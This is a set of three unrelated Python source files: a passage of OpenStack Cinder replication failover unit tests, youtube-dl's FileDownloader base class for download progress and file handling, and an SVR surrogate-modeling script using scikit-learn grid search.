self.assertRaises(exception.InvalidInput,
volume_api.thaw_host,
self.context,
host=CONF.host, cluster_name=None)
@mock.patch('cinder.volume.driver.BaseVD.failover_completed')
def test_failover_completed(self, completed_mock):
rep_field = fields.ReplicationStatus
svc = objects.Service(self.context, host=self.volume.host,
binary=constants.VOLUME_BINARY,
replication_status=rep_field.ENABLED)
svc.create()
self.volume.failover_completed(
self.context,
{'active_backend_id': 'secondary',
'replication_status': rep_field.FAILED_OVER})
service = objects.Service.get_by_id(self.context, svc.id)
self.assertEqual('secondary', service.active_backend_id)
self.assertEqual('failed-over', service.replication_status)
completed_mock.assert_called_once_with(self.context, 'secondary')
@mock.patch('cinder.volume.driver.BaseVD.failover_completed', wraps=True)
def test_failover_completed_driver_failure(self, completed_mock):
rep_field = fields.ReplicationStatus
svc = objects.Service(self.context, host=self.volume.host,
binary=constants.VOLUME_BINARY,
replication_status=rep_field.ENABLED)
svc.create()
self.volume.failover_completed(
self.context,
{'active_backend_id': 'secondary',
'replication_status': rep_field.FAILED_OVER})
service = objects.Service.get_by_id(self.context, svc.id)
self.assertEqual('secondary', service.active_backend_id)
self.assertEqual(rep_field.ERROR, service.replication_status)
self.assertTrue(service.disabled)
self.assertIsNotNone(service.disabled_reason)
completed_mock.assert_called_once_with(self.context, 'secondary')
@mock.patch('cinder.volume.rpcapi.VolumeAPI.failover_completed')
def test_finish_failover_non_clustered(self, completed_mock):
svc = mock.Mock(is_clustered=None)
self.volume.finish_failover(self.context, svc, mock.sentinel.updates)
svc.update.assert_called_once_with(mock.sentinel.updates)
svc.save.assert_called_once_with()
completed_mock.assert_not_called()
@mock.patch('cinder.volume.rpcapi.VolumeAPI.failover_completed')
def test_finish_failover_clustered(self, completed_mock):
svc = mock.Mock(cluster_name='cluster_name')
updates = {'status': 'error'}
self.volume.finish_failover(self.context, svc, updates)
completed_mock.assert_called_once_with(self.context, svc, updates)
svc.cluster.status = 'error'
svc.cluster.save.assert_called_once()
@ddt.data(None, 'cluster_name')
@mock.patch('cinder.volume.manager.VolumeManager.finish_failover')
@mock.patch('cinder.volume.manager.VolumeManager._get_my_volumes')
def test_failover_manager(self, cluster, get_vols_mock, finish_mock):
"""Test manager's failover method for clustered and not clustered."""
rep_field = fields.ReplicationStatus
svc = objects.Service(self.context, host=self.volume.host,
binary=constants.VOLUME_BINARY,
cluster_name=cluster,
replication_status=rep_field.ENABLED)
svc.create()
vol = objects.Volume(self.context, host=self.volume.host)
vol.create()
get_vols_mock.return_value = [vol]
with mock.patch.object(self.volume, 'driver') as driver:
called, not_called = driver.failover_host, driver.failover
if cluster:
called, not_called = not_called, called
called.return_value = ('secondary', [{'volume_id': vol.id,
'updates': {'status': 'error'}}], [])
self.volume.failover(self.context,
secondary_backend_id='secondary')
not_called.assert_not_called()
called.assert_called_once_with(self.context, [vol],
secondary_id='secondary', groups=[])
expected_update = {'replication_status': rep_field.FAILED_OVER,
'active_backend_id': 'secondary',
'disabled': True,
'disabled_reason': 'failed-over'}
finish_mock.assert_called_once_with(self.context, svc, expected_update)
volume = objects.Volume.get_by_id(self.context, vol.id)
self.assertEqual('error', volume.status)
@ddt.data(('host1', None), (None, 'mycluster'))
@ddt.unpack
def test_failover_api_fail_multiple_results(self, host, cluster):
"""Fail if we try to failover multiple backends in the same request."""
rep_field = fields.ReplicationStatus
clusters = [
objects.Cluster(self.context,
name='mycluster@backend1',
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY),
objects.Cluster(self.context,
name='mycluster@backend2',
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY)
]
clusters[0].create()
clusters[1].create()
services = [
objects.Service(self.context, host='host1@backend1',
cluster_name=clusters[0].name,
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY),
objects.Service(self.context, host='host1@backend2',
cluster_name=clusters[1].name,
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY),
]
services[0].create()
services[1].create()
self.assertRaises(exception.Invalid,
self.volume_api.failover, self.context, host,
cluster)
def test_failover_api_not_found(self):
self.assertRaises(exception.ServiceNotFound, self.volume_api.failover,
self.context, 'host1', None)
@mock.patch('cinder.volume.rpcapi.VolumeAPI.failover')
def test_failover_api_success_multiple_results(self, failover_mock):
"""Succeed to failover multiple services for the same backend."""
rep_field = fields.ReplicationStatus
cluster_name = 'mycluster@backend1'
cluster = objects.Cluster(self.context,
name=cluster_name,
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY)
cluster.create()
services = [
objects.Service(self.context, host='host1@backend1',
cluster_name=cluster_name,
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY),
objects.Service(self.context, host='host2@backend1',
cluster_name=cluster_name,
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY),
]
services[0].create()
services[1].create()
self.volume_api.failover(self.context, None, cluster_name,
mock.sentinel.secondary_id)
for service in services + [cluster]:
self.assertEqual(rep_field.ENABLED, service.replication_status)
service.refresh()
self.assertEqual(rep_field.FAILING_OVER,
service.replication_status)
failover_mock.assert_called_once_with(self.context, mock.ANY,
mock.sentinel.secondary_id)
self.assertEqual(services[0].id, failover_mock.call_args[0][1].id)
@mock.patch('cinder.volume.rpcapi.VolumeAPI.failover')
def test_failover_api_success_multiple_results_not_updated(self,
failover_mock):
"""Succeed to failover even if a service is not updated."""
rep_field = fields.ReplicationStatus
cluster_name = 'mycluster@backend1'
cluster = objects.Cluster(self.context,
name=cluster_name,
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY)
cluster.create()
services = [
objects.Service(self.context, host='host1@backend1',
cluster_name=cluster_name,
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY),
objects.Service(self.context, host='host2@backend1',
cluster_name=cluster_name,
replication_status=rep_field.ERROR,
binary=constants.VOLUME_BINARY),
]
services[0].create()
services[1].create()
self.volume_api.failover(self.context, None, cluster_name,
mock.sentinel.secondary_id)
for service in services[:1] + [cluster]:
service.refresh()
self.assertEqual(rep_field.FAILING_OVER,
service.replication_status)
services[1].refresh()
self.assertEqual(rep_field.ERROR, services[1].replication_status)
failover_mock.assert_called_once_with(self.context, mock.ANY,
mock.sentinel.secondary_id)
self.assertEqual(services[0].id, failover_mock.call_args[0][1].id)
@mock.patch('cinder.volume.rpcapi.VolumeAPI.failover')
def test_failover_api_fail_multiple_results_not_updated(self,
failover_mock):
"""Fail if none of the services could be updated."""
rep_field = fields.ReplicationStatus
cluster_name = 'mycluster@backend1'
cluster = objects.Cluster(self.context,
name=cluster_name,
replication_status=rep_field.ENABLED,
binary=constants.VOLUME_BINARY)
cluster.create()
down_time = timeutils.datetime.datetime(1970, 1, 1)
services = [
# This service is down
objects.Service(self.context, host='host1@backend1',
cluster_name=cluster_name,
replication_status=rep_field.ENABLED,
created_at=down_time,
updated_at=down_time,
modified_at=down_time,
binary=constants.VOLUME_BINARY),
# This service is not with the right replication status
objects.Service(self.context, host='host2@backend1',
cluster_name=cluster_name,
replication_status=rep_field.ERROR,
binary=constants.VOLUME_BINARY),
]
services[0].create()
services[1].create()
self.assertRaises(exception.InvalidInput,
self.volume_api.failover, self.context, None,
cluster_name, mock.sentinel.secondary_id)
for service in services:
svc = objects.Service.get_by_id(self.context, service.id)
self.assertEqual(service.replication_status,
svc.replication_status)
cluster.refresh()
self.assertEqual(rep_field.ENABLED, cluster.replication_status)
failover_mock.assert_not_called()
def _check_failover_db(self, get_method, expected_results):
db_data = get_method.get_all(self.context, None)
db_data = {e.id: e for e in db_data}
for expected in expected_results:
id_ = expected['id']
for key, value in expected.items():
self.assertEqual(value, getattr(db_data[id_], key),
'(%s) ref=%s != act=%s' % (
key, expected, dict(db_data[id_])))
def _test_failover_model_updates(self, in_volumes, in_snapshots,
driver_volumes, driver_result,
out_volumes, out_snapshots,
in_groups=None, out_groups=None,
driver_group_result=None,
secondary_id=None):
host = vol_utils.extract_host(self.manager.host)
utils.create_service(self.context, {'host': host,
'binary': 'cinder-volume'})
for volume in in_volumes:
utils.create_volume(self.context, self.manager.host, **volume)
for snapshot in in_snapshots:
utils.create_snapshot(self.context, **snapshot)
for group in in_groups:
utils.create_group(self.context, self.manager.host, **group)
with mock.patch.object(
self.manager.driver, 'failover_host',
return_value=(secondary_id, driver_result,
driver_group_result)) as driver_mock:
self.manager.failover_host(self.context, secondary_id)
self.assertSetEqual(driver_volumes,
{v.id for v in driver_mock.call_args[0][1]})
self._check_failover_db(objects.VolumeList, out_volumes)
self._check_failover_db(objects.SnapshotList, out_snapshots)
self._check_failover_db(objects.GroupList, out_groups)
@mock.patch('cinder.volume.utils.is_group_a_type')
def test_failover_host_model_updates(self, mock_group_type):
status = fields.ReplicationStatus
mock_group_type.return_value = True
in_groups = [
{'id': str(uuid.uuid4()), 'status': 'available',
'group_type_id': fake.GROUP_TYPE_ID,
'volume_type_ids': [fake.VOLUME_TYPE_ID],
'replication_status': status.FAILOVER_ERROR},
{'id': str(uuid.uuid4()), 'status': 'available',
'group_type_id': fake.GROUP_TYPE_ID,
'volume_type_ids': [fake.VOLUME_TYPE_ID],
'replication_status': status.ENABLED},
]
driver_group_result = [
{'group_id': in_groups[0]['id'],
'updates': {'replication_status': status.FAILOVER_ERROR}},
{'group_id': in_groups[1]['id'],
'updates': {'replication_status': status.FAILED_OVER}},
]
out_groups = [
{'id': in_groups[0]['id'], 'status': 'error',
'replication_status': status.FAILOVER_ERROR},
{'id': in_groups[1]['id'], 'status': in_groups[1]['status'],
'replication_status': status.FAILED_OVER},
]
# test volumes
in_volumes = [
{'id': str(uuid.uuid4()), 'status': 'available',
'replication_status': status.DISABLED},
{'id': str(uuid.uuid4()), 'status': 'in-use',
'replication_status': status.NOT_CAPABLE},
{'id': str(uuid.uuid4()), 'status': 'available',
'replication_status': status.FAILOVER_ERROR},
{'id': str(uuid.uuid4()), 'status': 'in-use',
'replication_status': status.ENABLED},
{'id': str(uuid.uuid4()), 'status': 'available',
'replication_status': status.FAILOVER_ERROR},
{'id': str(uuid.uuid4()), 'status': 'in-use',
'replication_status': status.ENABLED},
{'id': str(uuid.uuid4()), 'status': 'available',
'group_id': in_groups[0]['id'],
'replication_status': status.FAILOVER_ERROR},
{'id': str(uuid.uuid4()), 'status': 'available',
'group_id': in_groups[1]['id'],
'replication_status': status.ENABLED},
]
in_snapshots = [
{'id': v['id'], 'volume_id': v['id'], 'status': 'available'}
for v in in_volumes
]
driver_volumes = {
v['id'] for v in in_volumes
if v['replication_status'] not in (status.DISABLED,
status.NOT_CAPABLE)}
driver_result = [
{'volume_id': in_volumes[3]['id'],
'updates': {'status': 'error'}},
{'volume_id': in_volumes[4]['id'],
'updates': {'replication_status': status.FAILOVER_ERROR}},
{'volume_id': in_volumes[5]['id'],
'updates': {'replication_status': status.FAILED_OVER}},
{'volume_id': in_volumes[6]['id'],
'updates': {'replication_status': status.FAILOVER_ERROR}},
{'volume_id': in_volumes[7]['id'],
'updates': {'replication_status': status.FAILED_OVER}},
]
out_volumes = [
{'id': in_volumes[0]['id'], 'status': 'error',
'replication_status': status.NOT_CAPABLE,
'previous_status': in_volumes[0]['status']},
{'id': in_volumes[1]['id'], 'status': 'error',
'replication_status': status.NOT_CAPABLE,
'previous_status': in_volumes[1]['status']},
{'id': in_volumes[2]['id'], 'status': in_volumes[2]['status'],
'replication_status': status.FAILED_OVER},
{'id': in_volumes[3]['id'], 'status': 'error',
'previous_status': in_volumes[3]['status'],
'replication_status': status.FAILOVER_ERROR},
{'id': in_volumes[4]['id'], 'status': 'error',
'previous_status': in_volumes[4]['status'],
'replication_status': status.FAILOVER_ERROR},
{'id': in_volumes[5]['id'], 'status': in_volumes[5]['status'],
'replication_status': status.FAILED_OVER},
{'id': in_volumes[6]['id'], 'status': 'error',
'previous_status': in_volumes[6]['status'],
'replication_status': status.FAILOVER_ERROR},
{'id': in_volumes[7]['id'], 'status': in_volumes[7]['status'],
'replication_status': status.FAILED_OVER},
]
out_snapshots = [
{'id': ov['id'],
'status': 'error' if ov['status'] == 'error' else 'available'}
for ov in out_volumes
]
self._test_failover_model_updates(in_volumes, in_snapshots,
driver_volumes, driver_result,
out_volumes, out_snapshots,
in_groups, out_groups,
driver_group_result)
def test_failback_host_model_updates(self):
status = fields.ReplicationStatus
# IDs will be overwritten with UUIDs, but they help follow the code
in_volumes = [
{'id': 0, 'status': 'available',
'replication_status': status.DISABLED},
{'id': 1, 'status': 'in-use',
'replication_status': status.NOT_CAPABLE},
{'id': 2, 'status': 'available',
'replication_status': status.FAILOVER_ERROR},
{'id': 3, 'status': 'in-use',
'replication_status': status.ENABLED},
{'id': 4, 'status': 'available',
'replication_status': status.FAILOVER_ERROR},
{'id': 5, 'status': 'in-use',
'replication_status': status.FAILED_OVER},
]
# Generate real volume IDs
for volume in in_volumes:
volume['id'] = str(uuid.uuid4())
in_snapshots = [
{'id': in_volumes[0]['id'], 'volume_id': in_volumes[0]['id'],
'status': fields.SnapshotStatus.ERROR_DELETING},
{'id': in_volumes[1]['id'], 'volume_id': in_volumes[1]['id'],
'status': fields.SnapshotStatus.AVAILABLE},
{'id': in_volumes[2]['id'], 'volume_id': in_volumes[2]['id'],
'status': fields.SnapshotStatus.CREATING},
{'id': in_volumes[3]['id'], 'volume_id': in_volumes[3]['id'],
'status': fields.SnapshotStatus.DELETING},
{'id': in_volumes[4]['id'], 'volume_id': in_volumes[4]['id'],
'status': fields.SnapshotStatus.CREATING},
{'id': in_volumes[5]['id'], 'volume_id': in_volumes[5]['id'],
'status': fields.SnapshotStatus.CREATING},
]
driver_volumes = {
v['id'] for v in in_volumes
if v['replication_status'] not in (status.DISABLED,
status.NOT_CAPABLE)}
driver_result = [
{'volume_id': in_volumes[3]['id'],
'updates': {'status': 'error'}},
{'volume_id': in_volumes[4]['id'],
'updates': {'replication_status': status.FAILOVER_ERROR}},
{'volume_id': in_volumes[5]['id'],
'updates': {'replication_status': status.FAILED_OVER}},
]
out_volumes = [
{'id': in_volumes[0]['id'], 'status': in_volumes[0]['status'],
'replication_status': in_volumes[0]['replication_status'],
'previous_status': None},
{'id': in_volumes[1]['id'], 'status': in_volumes[1]['status'],
'replication_status': in_volumes[1]['replication_status'],
'previous_status': None},
{'id': in_volumes[2]['id'], 'status': in_volumes[2]['status'],
'replication_status': status.ENABLED},
{'id': in_volumes[3]['id'], 'status': 'error',
'previous_status': in_volumes[3]['status'],
'replication_status': status.FAILOVER_ERROR},
{'id': in_volumes[4]['id'], 'status': 'error',
'previous_status': in_volumes[4]['status'],
'replication_status': status.FAILOVER_ERROR},
{'id': in_volumes[5]['id'], 'status': in_volumes[5]['status'],
'replication_status': status.ENABLED},
]
# Snapshot status is preserved except for those that error the failback
out_snapshots = in_snapshots[:]
out_snapshots[3]['status'] = fields.SnapshotStatus.ERROR
out_snapshots[4]['status'] = fields.SnapshotStatus.ERROR
self._test_failover_model_updates(in_volumes, in_snapshots,
driver_volumes, driver_result,
out_volumes, out_snapshots,
[], [], [],
self.manager.FAILBACK_SENTINEL)
| |
from __future__ import division, unicode_literals
import os
import re
import sys
import time
from ..compat import compat_str
from ..utils import (
encodeFilename,
format_bytes,
timeconvert,
)
class FileDownloader(object):
"""File Downloader class.
File downloader objects are the ones responsible of downloading the
actual video file and writing it to disk.
File downloaders accept a lot of parameters. In order not to saturate
the object constructor with arguments, it receives a dictionary of
options instead.
Available options:
verbose: Print additional info to stdout.
quiet: Do not print messages to stdout.
ratelimit: Download speed limit, in bytes/sec.
retries: Number of times to retry for HTTP error 5xx
buffersize: Size of download buffer in bytes.
noresizebuffer: Do not automatically resize the download buffer.
continuedl: Try to continue downloads if possible.
noprogress: Do not print the progress bar.
logtostderr: Log messages to stderr instead of stdout.
consoletitle: Display progress in console window's titlebar.
nopart: Do not use temporary .part files.
updatetime: Use the Last-modified header to set output file timestamps.
test: Download only first bytes to test the downloader.
min_filesize: Skip files smaller than this size
max_filesize: Skip files larger than this size
xattr_set_filesize: Set ytdl.filesize user xattribute with expected size.
(experimenatal)
external_downloader_args: A list of additional command-line arguments for the
external downloader.
Subclasses of this one must re-define the real_download method.
"""
_TEST_FILE_SIZE = 10241
params = None
def __init__(self, ydl, params):
"""Create a FileDownloader object with the given options."""
self.ydl = ydl
self._progress_hooks = []
self.params = params
self.add_progress_hook(self.report_progress)
@staticmethod
def format_seconds(seconds):
(mins, secs) = divmod(seconds, 60)
(hours, mins) = divmod(mins, 60)
if hours > 99:
return '--:--:--'
if hours == 0:
return '%02d:%02d' % (mins, secs)
else:
return '%02d:%02d:%02d' % (hours, mins, secs)
@staticmethod
def calc_percent(byte_counter, data_len):
if data_len is None:
return None
return float(byte_counter) / float(data_len) * 100.0
@staticmethod
def format_percent(percent):
if percent is None:
return '---.-%'
return '%6s' % ('%3.1f%%' % percent)
@staticmethod
def calc_eta(start, now, total, current):
if total is None:
return None
if now is None:
now = time.time()
dif = now - start
if current == 0 or dif < 0.001: # One millisecond
return None
rate = float(current) / dif
return int((float(total) - float(current)) / rate)
@staticmethod
def format_eta(eta):
if eta is None:
return '--:--'
return FileDownloader.format_seconds(eta)
@staticmethod
def calc_speed(start, now, bytes):
dif = now - start
if bytes == 0 or dif < 0.001: # One millisecond
return None
return float(bytes) / dif
@staticmethod
def format_speed(speed):
if speed is None:
return '%10s' % '---b/s'
return '%10s' % ('%s/s' % format_bytes(speed))
@staticmethod
def best_block_size(elapsed_time, bytes):
new_min = max(bytes / 2.0, 1.0)
new_max = min(max(bytes * 2.0, 1.0), 4194304) # Do not surpass 4 MB
if elapsed_time < 0.001:
return int(new_max)
rate = bytes / elapsed_time
if rate > new_max:
return int(new_max)
if rate < new_min:
return int(new_min)
return int(rate)
@staticmethod
def parse_bytes(bytestr):
"""Parse a string indicating a byte quantity into an integer."""
matchobj = re.match(r'(?i)^(\d+(?:\.\d+)?)([kMGTPEZY]?)$', bytestr)
if matchobj is None:
return None
number = float(matchobj.group(1))
multiplier = 1024.0 ** 'bkmgtpezy'.index(matchobj.group(2).lower())
return int(round(number * multiplier))
def to_screen(self, *args, **kargs):
self.ydl.to_screen(*args, **kargs)
def to_stderr(self, message):
self.ydl.to_screen(message)
def to_console_title(self, message):
self.ydl.to_console_title(message)
def trouble(self, *args, **kargs):
self.ydl.trouble(*args, **kargs)
def report_warning(self, *args, **kargs):
self.ydl.report_warning(*args, **kargs)
def report_error(self, *args, **kargs):
self.ydl.report_error(*args, **kargs)
def slow_down(self, start_time, now, byte_counter):
"""Sleep if the download speed is over the rate limit."""
rate_limit = self.params.get('ratelimit', None)
if rate_limit is None or byte_counter == 0:
return
if now is None:
now = time.time()
elapsed = now - start_time
if elapsed <= 0.0:
return
speed = float(byte_counter) / elapsed
if speed > rate_limit:
time.sleep(max((byte_counter // rate_limit) - elapsed, 0))
def temp_name(self, filename):
"""Returns a temporary filename for the given filename."""
if self.params.get('nopart', False) or filename == '-' or \
(os.path.exists(encodeFilename(filename)) and not os.path.isfile(encodeFilename(filename))):
return filename
return filename + '.part'
def undo_temp_name(self, filename):
if filename.endswith('.part'):
return filename[:-len('.part')]
return filename
def try_rename(self, old_filename, new_filename):
try:
if old_filename == new_filename:
return
os.rename(encodeFilename(old_filename), encodeFilename(new_filename))
except (IOError, OSError) as err:
self.report_error('unable to rename file: %s' % compat_str(err))
def try_utime(self, filename, last_modified_hdr):
"""Try to set the last-modified time of the given file."""
if last_modified_hdr is None:
return
if not os.path.isfile(encodeFilename(filename)):
return
timestr = last_modified_hdr
if timestr is None:
return
filetime = timeconvert(timestr)
if filetime is None:
return filetime
# Ignore obviously invalid dates
if filetime == 0:
return
try:
os.utime(filename, (time.time(), filetime))
except Exception:
pass
return filetime
def report_destination(self, filename):
"""Report destination filename."""
self.to_screen('[download] Destination: ' + filename)
def _report_progress_status(self, msg, is_last_line=False):
fullmsg = '[download] ' + msg
if self.params.get('progress_with_newline', False):
self.to_screen(fullmsg)
else:
if os.name == 'nt':
prev_len = getattr(self, '_report_progress_prev_line_length',
0)
if prev_len > len(fullmsg):
fullmsg += ' ' * (prev_len - len(fullmsg))
self._report_progress_prev_line_length = len(fullmsg)
clear_line = '\r'
else:
clear_line = ('\r\x1b[K' if sys.stderr.isatty() else '\r')
self.to_screen(clear_line + fullmsg, skip_eol=not is_last_line)
self.to_console_title('youtube-dl ' + msg)
def report_progress(self, s):
if s['status'] == 'finished':
if self.params.get('noprogress', False):
self.to_screen('[download] Download completed')
else:
s['_total_bytes_str'] = format_bytes(s['total_bytes'])
if s.get('elapsed') is not None:
s['_elapsed_str'] = self.format_seconds(s['elapsed'])
msg_template = '100%% of %(_total_bytes_str)s in %(_elapsed_str)s'
else:
msg_template = '100%% of %(_total_bytes_str)s'
self._report_progress_status(
msg_template % s, is_last_line=True)
if self.params.get('noprogress'):
return
if s['status'] != 'downloading':
return
if s.get('eta') is not None:
s['_eta_str'] = self.format_eta(s['eta'])
else:
s['_eta_str'] = 'Unknown ETA'
if s.get('total_bytes') and s.get('downloaded_bytes') is not None:
s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes'])
elif s.get('total_bytes_estimate') and s.get('downloaded_bytes') is not None:
s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes_estimate'])
else:
if s.get('downloaded_bytes') == 0:
s['_percent_str'] = self.format_percent(0)
else:
s['_percent_str'] = 'Unknown %'
if s.get('speed') is not None:
s['_speed_str'] = self.format_speed(s['speed'])
else:
s['_speed_str'] = 'Unknown speed'
if s.get('total_bytes') is not None:
s['_total_bytes_str'] = format_bytes(s['total_bytes'])
msg_template = '%(_percent_str)s of %(_total_bytes_str)s at %(_speed_str)s ETA %(_eta_str)s'
elif s.get('total_bytes_estimate') is not None:
s['_total_bytes_estimate_str'] = format_bytes(s['total_bytes_estimate'])
msg_template = '%(_percent_str)s of ~%(_total_bytes_estimate_str)s at %(_speed_str)s ETA %(_eta_str)s'
else:
if s.get('downloaded_bytes') is not None:
s['_downloaded_bytes_str'] = format_bytes(s['downloaded_bytes'])
if s.get('elapsed'):
s['_elapsed_str'] = self.format_seconds(s['elapsed'])
msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s (%(_elapsed_str)s)'
else:
msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s'
else:
msg_template = '%(_percent_str)s % at %(_speed_str)s ETA %(_eta_str)s'
self._report_progress_status(msg_template % s)
def report_resuming_byte(self, resume_len):
"""Report attempt to resume at given byte."""
self.to_screen('[download] Resuming download at byte %s' % resume_len)
def report_retry(self, count, retries):
"""Report retry in case of HTTP error 5xx"""
self.to_screen('[download] Got server HTTP error. Retrying (attempt %d of %d)...' % (count, retries))
def report_file_already_downloaded(self, file_name):
"""Report file has already been fully downloaded."""
try:
self.to_screen('[download] %s has already been downloaded' % file_name)
except UnicodeEncodeError:
self.to_screen('[download] The file has already been downloaded')
def report_unable_to_resume(self):
"""Report it was impossible to resume download."""
self.to_screen('[download] Unable to resume')
def download(self, filename, info_dict):
"""Download to a filename using the info from info_dict
Return True on success and False otherwise
"""
nooverwrites_and_exists = (
self.params.get('nooverwrites', False) and
os.path.exists(encodeFilename(filename))
)
continuedl_and_exists = (
self.params.get('continuedl', True) and
os.path.isfile(encodeFilename(filename)) and
not self.params.get('nopart', False)
)
# Check file already present
if filename != '-' and nooverwrites_and_exists or continuedl_and_exists:
self.report_file_already_downloaded(filename)
self._hook_progress({
'filename': filename,
'status': 'finished',
'total_bytes': os.path.getsize(encodeFilename(filename)),
})
return True
sleep_interval = self.params.get('sleep_interval')
if sleep_interval:
self.to_screen('[download] Sleeping %s seconds...' % sleep_interval)
time.sleep(sleep_interval)
return self.real_download(filename, info_dict)
def real_download(self, filename, info_dict):
"""Real download process. Redefine in subclasses."""
raise NotImplementedError('This method must be implemented by subclasses')
def _hook_progress(self, status):
for ph in self._progress_hooks:
ph(status)
def add_progress_hook(self, ph):
# See YoutubeDl.py (search for progress_hooks) for a description of
# this interface
self._progress_hooks.append(ph)
def _debug_cmd(self, args, subprocess_encoding, exe=None):
if not self.params.get('verbose', False):
return
if exe is None:
exe = os.path.basename(args[0])
if subprocess_encoding:
str_args = [
a.decode(subprocess_encoding) if isinstance(a, bytes) else a
for a in args]
else:
str_args = args
try:
import pipes
shell_quote = lambda args: ' '.join(map(pipes.quote, str_args))
except ImportError:
shell_quote = repr
self.to_screen('[debug] %s command line: %s' % (
exe, shell_quote(str_args)))
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2017 Masten Space Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Jack Nelson <jnelson@masten.aero>
"""
import csv
import os
import sys
import logging
from time import time
from operator import itemgetter
from itertools import izip
import pickle
import numpy as np
from sklearn.svm import SVR
from sklearn import cross_validation
from sklearn import preprocessing
from sklearn import grid_search
from sklearn import metrics
from scipy import stats
import pandas as pd
"""
surrogate_modeler.py
We construct the surrogate model by performing Support Vector Regression (SVR) with a Radial Basis
Function (RBF) kernel using Scikit-learn's Support Vector Machine (SVM) library.
The inputs to the modeling algorithm serve as training data for the SVR algorithm. This includes the
geometric description of each design in the training run, that is the independent or "design" variables,
and the corresponding CFD output metrics, the dependent variables or "performance metrics".
The algorithm trains a surrogate model on the design variables and performance metrics, cross-validates
the model, then returns the SVR object representing the surrogate model that can then be used to
perform sensitivity analysis.
"""
######################################
# CONFIGURATION FILE SELECTION
# get the absolute path to config file
thispath = os.path.dirname(os.path.abspath(__file__))
config_relative_path = "/../"
config_abspath = thispath + config_relative_path
sys.path.append(config_abspath)
# choose the root config file to use
from config import *
# Data normalization flag. This should always be True
normalize = True
output_directory = './SM_outputs/'
######################################
logging.basicConfig(level = logging.DEBUG)
def load_data_from_csv(data_file):
"""
Unpacks a generic csv of data and returns an array of header field names (assumed to be the
first row of the csv) and an array of the data fields themselves.
"""
with open(data_file) as f:
data_header = f.readline().split(',')
data_fields = [i.strip() for i in data_header]
data = np.genfromtxt(os.path.join(data_file), delimiter=',')[1:]
return data_fields, data
# Utility function to report best scores
# Gratuitously copied from the scikit-learn example "Comparing randomized search and grid search for
# hyperparameter estimation" at (http://scikit-learn.org/stable/auto_examples/model_selection/randomized_search.html)
def report(grid_scores, n_top=3):
print("\nModel cross-validation report")
top_scores = sorted(grid_scores, key=itemgetter(1), reverse=True)[:n_top]
for i, score in enumerate(top_scores):
print("Model with rank: {0}".format(i + 1))
print ("Mean validation score: %1.4f (std: %1.4f)" %(score.mean_validation_score, np.std(score.cv_validation_scores)))
#print("Mean validation score: {0:.3f} (std: {1:.3f})".format(
#score.mean_validation_score,
#np.std(score.cv_validation_scores)))
print("Parameters: {0}".format(score.parameters))
print("")
def generate_optimized_surrogate(X_train, Y_train, label, C_range = [0.1, 5], epsilon_range = 0.01, grid_iter = 10, scoring = 'r2'):
"""
Trains a surrogate model using Radial Basis Function (RBF) Support Vector Regression (SVR)
while cross-validating the model and searching the hyperparameter space for optimal values
of C and epsilon. If a testing (evaluation) data set is provided, it evaluates the best model
on the testing set.
This function assumes/requires that the X and Y data inputs be scaled between 0.0 and 1.0.
Returns the best surrogate model from cross-validation and (if applicable) evaluation.
"""
# We're going to roll model training, cross-validation, and hyperparameter optimization
# all into one function call. First, we need to set up our model to be trained (an SVR object), and
# create a dictionary containing the range of values to search for optimal hyperparameters
svr = SVR(kernel = 'rbf')
params = {'C': np.linspace(C_range[0], C_range[1], grid_iter),
'epsilon' : [np.std(Y_train) + i for i in np.linspace(-epsilon_range, epsilon_range, grid_iter)]}
# initialize our grid search object. For all intents and purposes, this *will* be our
# surrogate model because, once we train it, we can make predictions on other data with it.
# Explanation of parameters:
#
# param_grid: the dictionary of parameter settings to use for the gridsearch
# n_jobs: the number of parallel jobs to run
# scoringg: the scoring methodology to use to evaluate and compare models
# cv: The cross-validation algorithm to use. Passing an integer K instructs the algorithm to
# divide the training data into K different folds and cross-validate on each. When K = N where
# N is the number of samples in the training data, it is essentially Leave-One-Out crossval.
#
search = grid_search.GridSearchCV(estimator = svr,
param_grid = params,
n_jobs = parallel_jobs,
scoring = scoring,
cv = np.shape(Y_train)[0],
verbose = 0)
# run the grid search algorithm to simultaneously train and cross validate our
# SVR model while searching the hyper parameter spaces for the optimal parameter
# values.
start = time()
print "X_train.values"
print type(X_train.values)
print np.shape(X_train.values)
print "\nY_train.values"
print type(Y_train.values)
print np.shape(Y_train.values)
search.fit(X_train.values, Y_train.values)
print "GridSearchSearchCV took %1.2f seconds." %((time() - start))
print "grid_scores_ shape: ", np.shape(search.grid_scores_)
if DEBUG:
# let's plot the gridsearch scores across the searched hyperparameter space.
# first, we get the grid_scores_ array from our gridsearch object and extract
# the number of hyperparameters we search
scores = search.grid_scores_
hparameters = params.keys()
C_hparams = params['C']
epsilon_hparams = params['epsilon']
score_dimension = 2
# create a new array to contain the mesh of scores
score_map = np.empty(np.shape(scores)[0])
for m, score in enumerate(scores):
mean = score[1]
score_map[m] = -mean
score_map = np.reshape(score_map, (grid_iter, grid_iter))
# now create the plot
fig, ax = plt.subplots()
if score_dimension == 2:
heatmap = ax.pcolormesh(epsilon_hparams, C_hparams, score_map, cmap = 'viridis')
ax.set_xlabel(hparameters[0])
ax.set_ylabel(hparameters[1])
ax.set_title("%s Hyperparameter score heatmap\n%s" %(label, data_name))
fig.colorbar(heatmap)
fig.savefig("%s%s_%s_hyperparameter_heatmap.png" %(output_directory, label, data_name))
#plt.show()
report(search.grid_scores_)
